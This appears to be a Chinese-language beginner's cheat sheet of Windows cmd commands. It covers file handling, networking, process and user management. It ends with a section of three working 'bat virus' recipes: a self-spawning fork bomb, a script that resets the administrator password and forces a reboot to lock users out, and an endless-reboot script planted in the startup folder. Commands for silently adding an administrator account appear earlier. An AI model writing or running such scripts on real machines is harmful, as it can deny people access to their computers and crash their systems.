cmd命令如下
echo
echo 1>1.txt 覆盖1到1.txt到当前目录
echo 114514>>1.txt 追加写入1到1.txt到当前目录
dir
dir 显示当前目录文件
cd和d:
d:(进入d盘)
cd.进入当前目录
cd…进入上一级目录
cd 文件夹名(进入该文件夹)
tree
tree 文件夹
显示当前文件夹的结构(描述可能不准?)
md和rd
md 文件夹名字(创建文件夹)
rd 文件夹名字(删除文件夹)
ipconfig
ipconfig(显示ip配置 网络状态啥的)
ipconfig /all(啥都给你看 好像不常用?)
cls
清屏 直接输就可以了
copy
copy 1.txt …\1.txt
把1.txt复制粘贴到上一级目录
如果有重名他会问你
覆盖 …\1.txt 吗? (Yes/No/All):
也可以复制粘贴的时候改名
比如
copy 1.txt Desktop\3.txt
把当前目录的1.txt复制到桌面改名为3.txt
copy 1.txt+2.txt 3.txt
把1.txt和2.txt的东西拼接成3.txt
move
从上一级目录把1.txt移动到当前目录改名为2.txt
move …\1.txt 2.txt
ren
ren 1.txt 5.txt
改名 不能改重名
del
del 1.txt 2.txt
永久删除1.txt 和 2.txt
ping
ping www.baidu.com -t(-t是一直ping的参数)
ctrl+c停止
type
显示文本文件内容
type 1.txt
reg
不好说 之后再说()
nslook
nslook www.chabug.org 查询
nslookup -d www.chabug.org历史查询
find
find “a” 1.txt显示1.txt带a那行的文本
find /n “a” 1.txt在上面的基础上再显示行号
type 1.txt | find /n “a” 1.txt相当于把1.txt显示的内容传给find执行
tasklist taskkill
tasklist显示进程列表
taskkill /pid 号(杀死指定进程
可以在后面加/T 删除整个进程
/F强制终止)
ver和winver
显示版本 一个弹窗 一个显示文本
start
start calc开启一个计算器
start ping www.baidu.com -t
感觉 就是新开个弹窗(?)
systeminfo
查看整个系统信息
logoff
logoff 当场注销
shutdown
参数老多了
建议自己shutdown/?
telnet
连其他设备用的
arp
arp -a能看当前内网用啥主机
at
定时任务
at 12:34 “shutdown /r /t”
在12:34就重启
at 1 /delete
假如上面那个作业id为1 那就可以这样删除这个指令
net
net user 用户名 /del
删除某个用户
net user 用户名 密码 /add
加某个用户
net stop telnet
net start telnet
启动或停止某服务
net localgroup administrators admin /add
给admin加管理员权限
下面 用cmd命令编写几个bat病毒罢
建议在虚拟机上跑一下 发现快炸了就马上快照返回x
1 最简单的耗尽资源的bat病毒
start cmd
%0
只需要写入txt文件上面的内容
然后改后缀为.bat 启动即可
2 锁机病毒
echo net user administrator 密码 > C:\Windows\Temp\1.bat
echo shutdown /r /t 0 >> C:\windows\temp\1.bat
3无限重启病毒
echo shutdown /r /t 0 > C:\Windows\Temp\1.bat
copy C:\Windows\Temp\1.bat “什么系统就使用说明开机自启目录”
这个目录下系统开机默认执行 所以重启脚本放进去就可以变成无限重启病毒